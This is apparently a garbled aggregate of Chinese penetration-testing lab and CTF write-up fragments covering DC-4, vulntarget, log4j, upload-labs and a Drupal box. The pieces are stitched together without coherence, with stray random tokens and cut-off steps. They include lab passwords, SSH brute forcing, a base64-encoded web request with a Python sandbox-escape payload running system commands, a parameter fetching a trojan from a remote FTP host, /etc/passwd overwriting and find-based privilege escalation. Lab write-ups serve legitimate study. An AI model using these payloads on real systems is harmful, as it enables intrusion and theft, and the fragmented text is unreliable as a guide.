01 项目安装 首先咱们需要将DC-4的靶机下载,并安装到咱们的靶机上 下载地址是:https://www.five86.com/dc-4.html ? 使用hydra对ssh进行爆破 4. 通过现有的脚本进行提权操作 -END-
host: 192.168.241.137 login: jim password: jibril04 登陆提示邮件,查看/var/mail查看邮件内有charles的密码 jim@dc-4: /var/mail$ cat jim From charles@dc-4 Sat Apr 06 21:15:46 2019 Return-path: <charles@dc-4> Envelope-to : jim@dc-4 Delivery-date: Sat, 06 Apr 2019 21:15:46 +1000 Received: from charles by dc-4 with local ( Exim 4.89) (envelope-from <charles@dc-4>) id 1hCjIX-0000kO-Qt for jim@dc-4; Sat ; charset="UTF-8" Content-Transfer-Encoding: 8bit Message-Id: <E1hCjIX-0000kO-Qt@dc-4> From: Charles
该靶场共有4个flag,分布于不同的靶机。 扫描端口 由于开局就给个IP。 一般打法就是先扫个路径+端口 这里发现8983端口有点东西 http://39.99.224.67:8983 发现log4j组件 打一发成功触发 反弹shell 尝试提权 原来准备先传个vshell上去 :/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4: ⼀般打靶场这种后续都可以利⽤到。 CVE-2019-1253 : VULNERABLE [>] https://github.com/padovah4ck/CVE-2019-1253 [!]
该靶场共有4个flag,分布于不同的靶机。 入口 进入后台getshell 弱口令admin/123456 这里可以添加后缀。但是php不被允许,所以可以填phtml 经过测试发现是拦截了<?
(Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 dc:e8:ad:80:35:81:c4:29:7e:cf:e4:70:f2:69:d9:96 (RSA) | 256 46:20:20:03:9c:97:35:f6:2d:5d:62:4a:be:6c:95:8e (ECDSA) |_ 256 ae:90:88:f6:63:8d:dc:60 :fa:ff:fc:70:12:e4:f4:1f (ED25519) MAC Address: 00:0C:29:1B:B5:A2 (VMware) Warning: OSScan results may because we could not find at least 1 open and 1 closed port Device type: general purpose Running: Linux 4. X|5.X OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 OS details: Linux 4.15 - 5.8 Network
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0xNDU3ODUzNjcwMTMzNTUyOTgzMDExNzk0MzIxNzYKQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSJ0aW1lX2ludGVydmFsIgoKMjAyOS0wNS0yNiB0byAyMDI5LTA1LTI3Ci0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tMTQ1Nzg1MzY3MDEzMzU1Mjk4MzAxMTc5NDMyMTc2CkNvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT0ibGVhdmVfcmVxdWVzdCIKCntjbWR9Ci0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tMTQ1Nzg1MzY3MDEzMzU1Mjk4MzAxMTc5NDMyMTc2CkNvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT0ic2lnbmF0dXJlIjsgZmlsZW5hbWU9IlVudGl0bGVkLnBuZyIKQ29udGVudC1UeXBlOiBpbWFnZS9wbmcKColQTkcKGgoAAAAKSUhEUgAAAAoAAAAKCAIAAAACUFjqAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAAApSURBVChTY9i fbuAgAADAwMHB8f8+fMlJCSAbARA5gNVQFkjGzAwAADL7QTzijujCwAAAABJRU5ErkJgggotLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLTE0NTc4NTM2NzAxMzM1NTI5ODMwMTE3OTQzMjE3NgpDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9InVzZXJfaW5wdXQiCgo8cD5hc2RmPC9wPgotLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLTE0NTc4NTM2NzAxMzM1NTI5ODMwMTE3OTQzMjE3Ni0t PGZvbnQgY29sb3I9IlsgWyBnZXRhdHRyKHBvdywgV29yZCgnX19nbG9iYWxzX18nKSlbJ29zJ10uc3lzdGVtKCd7Y21kfScpIGZvciBXb3JkIGluIFsgb3JnVHlwZUZ1biggJ1dvcmQnLCAoc3RyLCksIHsgJ211dGF0ZWQnOiAxLCAnc3RhcnRzd2l0aCc6IGxhbWJkYSBzZWxmLCB4OiBGYWxzZSwgJ19fZXFfXyc6IGxhbWJkYSBzZWxmLCB4OiBzZWxmLm11dGF0ZSgpIGFuZCBzZWxmLm11dGF0ZWQgPCAwIGFuZCBzdHIoc2VsZikgPT0geCwgJ211dGF0ZSc6IGxhbWJkYSBzZWxmOiB7c2V0YXR0cihzZWxmLCAnbXV0YXRlZCcsIHNlbGYubXV0YXRlZCAtIDEpfSwgJ19faGFzaF9fJzogbGFtYmRhIHNlbGY6IGhhc2goc3RyKHNlbGYpKSwgfSwgKSBdIF0gZm9yIG9yZ1R5cGVGdW4gaW4gW3R5cGUodHlwZSgxKSldXSBhbmQgJ3JlZCciPgoxPC9mb250PjwvcD4
https://www.vulnhub.com/entry/boredhackerblog-social-network,454/
乌鸦安全的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。
vulntarget-2下载地址 百度云: 链接: https://pan.baidu.com/s/1Hdqkojmu-CeIuPr2gLWHwA 提取码:s4ka 阿里云暂不支持zip文件分享。。。。 m=client&f=download&version=1&link=ZnRwOi8vMTkyLjE2OC41Mi4xL3NoZWxsLnBocA== link位置是base64编码的地址 然后正常访问到下载的木马文件
192.168.0.104 Linux Kernel 192.168.0.103 涉及技术 主机发现 网络扫描 强制访问 参数爆破 文件包含 PHP封装器 任意文件读取 SSH公钥登录 离线密码破解 系统权限漏洞利用 打靶开始 passwd可以进行文件写入 使用,openssl 生成一段密文 openssl passwd -1 然后替换/etc/passwd里面的x 20210925234956721039.png 提权成功,打靶结束
: 192.168.153.130 192.168.1.102 win7 > ip :192.168.153.128 win10 > ip : 192.168.153.129 0x02 打靶记录
找了半天: root:vulntarget-f 使用口令登录root用户,获得root权限: 获取/root下的flag vulntarget-f{------dsjlkfj489rjgr----} 4. 下载的提权脚本提取的时候会有问题 3、做隧道要使用frp,msf不稳,很容易掉 4、上面我用到了yakit,里面也带了端口扫描的功能,当时我偷懒还没用frp直接上传的fscan
乌鸦安全的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。
:/s5Y1">5>wZ WIN2016$ vulntarget.com c2 3e 11 5a 0e 59 54 f0 7c 60 e0 46 1a ab 19 68 4b a3 44 b4 0c 38 a7 ac 2a 67 ad 5d b9 ee 1b cc e4 5d 82 53 8e 21 d1 8c 7e 3a cb 06 e2 04 6a 2e 4d 35 5a a2 64 c3 85 ae 4a c8 99 42 42 40 43 8b 35 43 cf 9c bb 10 7a dd 63 72 f6 ba 6c 7a 6b 42 fd 87 6e 76 d4 b4 71 78 4f a3 44 b4 0c 38 a7 ac 2a 67 ad 5d b9 ee 1b cc e4 5d 82 53 8e 21 d1 8c 7e 3a cb 06 e2 04 6a 2e 4d 35 5a b4 71 78 4f 27 8f 26 a9 ae 63 c2 b0 dd 5e 20 21 ad 4e 4e 1d 71 5b 1a 14 e6 6f 85 ab 45 3
' 05 提权 在服务器一通查询,发现在 /home/mark/stuff 目录下有个things-to-do.txt文件 查看一下发现居然有服务器账号和密码 graham - GSo7isUM1D4-
sudo arp-scan -l [sudo] password for kali: Interface: eth0, type: EN10MB, MAC: 08:00:27:ad:25:87, IPv4: administered)10.0.2.2 52:54:00:12:35:00 (Unknown: locally administered)10.0.2.3 08:00:27:f4: ae:aa (Unknown)10.0.2.5 08:00:27:e2:19:54 (Unknown)4 packets received by filter, 0 packets dropped by kernelEnding arp-scan 1.10.0: 256 hosts scanned in 2.058 seconds (124.39 hosts/sec). 4 erp = new Array;erp[0] = 1008813135;erp[1] = 1129601360;erp[2] = 1159751796;erp[3] = 1835810317;erp[4]
在页面中多浏览一下,发现Contact模块下可以输入内容,于是尝试多输入几次之后,发现了有意思的地方
> ③ - 说明 确认webshell上传成功的演示只在Pass01[3]演示一遍 本题使用的webshell均为最简单的phpinfo(),一句话木马getshell会在Pass02[4]演示一遍 ,之后将不再演示1. webshell最好设置不同名,或者在每次上传成功后删除,避免出现绕过失败但测试成功的情况 Pass14~Pass21的题解见:打靶归来 - 详解upload-labs靶场(下) ok385 g83e4 【Pass02 - MIME类型过滤】 题目: vl1wc 绕过方法: 通过抓包修改请求头的MIME类型绕过过滤 第一步:上传webshell 第二步:抓包,修改MIME类型 第三步 00wyo 第四步:直接访问更改了后缀的WebShell文件即可执行该文件(1.png) xi4ik 【Pass05 - 利用.user.ini文件包含】 题目: idmjf 6q2kp 绕过方法 本题没有过滤 第二步:抓包,然后修改POST中的路径值 第二步的详细步骤: 修改完成后发包 eyz8z gwvo1 l3uej wj7yd 第三步:访问0x00前填入的文件名,判断是否上传成功 下篇正在路上……… jm4ki
前言 这篇文章是零度安全2021年的首篇文章,后期将会陆续更新打靶,实战系列的文章。 在这里也感谢大家对零度安全的支持与信任。 ? 4. 这个时候我们获取了123456 加密后的密码 进入数据库执行 update users set pass='SDlSKHHi7ce.SDNqIi.ADRfU4jht/eXAyXmj8pINH0oqLO4IW9vOM'where 看到了fag4,提示我们去/home寻找线索 于是: cd /home cd flag4 cat flag4.txt ? 可以看到find也在其中,直接使用find命令进行越权 输入 find/home/flag4 -exec "whoami" \; 这里flag4是目录,你也可以指向任意目录 ?
打靶过程 3.1 第一层 nmap端口扫描 看到80端口开放的Laravel 寻找了多个EXP之后,终于找到一个能用的:将脚本文件和phpggc这个脚本放在同一级目录下 phpgcc:https:/